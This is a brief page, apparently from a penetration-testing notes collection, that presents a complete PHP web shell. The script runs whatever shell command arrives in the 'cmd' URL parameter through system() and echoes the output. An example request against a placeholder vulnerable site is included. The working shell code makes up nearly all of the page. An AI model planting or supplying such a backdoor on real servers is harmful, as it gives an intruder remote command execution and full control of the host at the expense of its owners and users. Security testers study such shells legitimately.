Webshell

PHP script that provides a simple webshell (via the cmd query parameter),

Eg. https://vuln-website.com/path?cmd=ls

<?php
// Check if 'cmd' parameter is set in the URL
if (isset($_GET['cmd'])) {
    // Get the value of 'cmd' parameter
    $cmd = $_GET['cmd'];

    // Display the value safely
    echo "Command: " . htmlspecialchars($cmd) . "<br><br>";

    // Execute the command and output the result
    echo "<pre>";
    system($cmd);
    echo "</pre>";
} else {
    echo "No command provided.";
}
?>

Last updated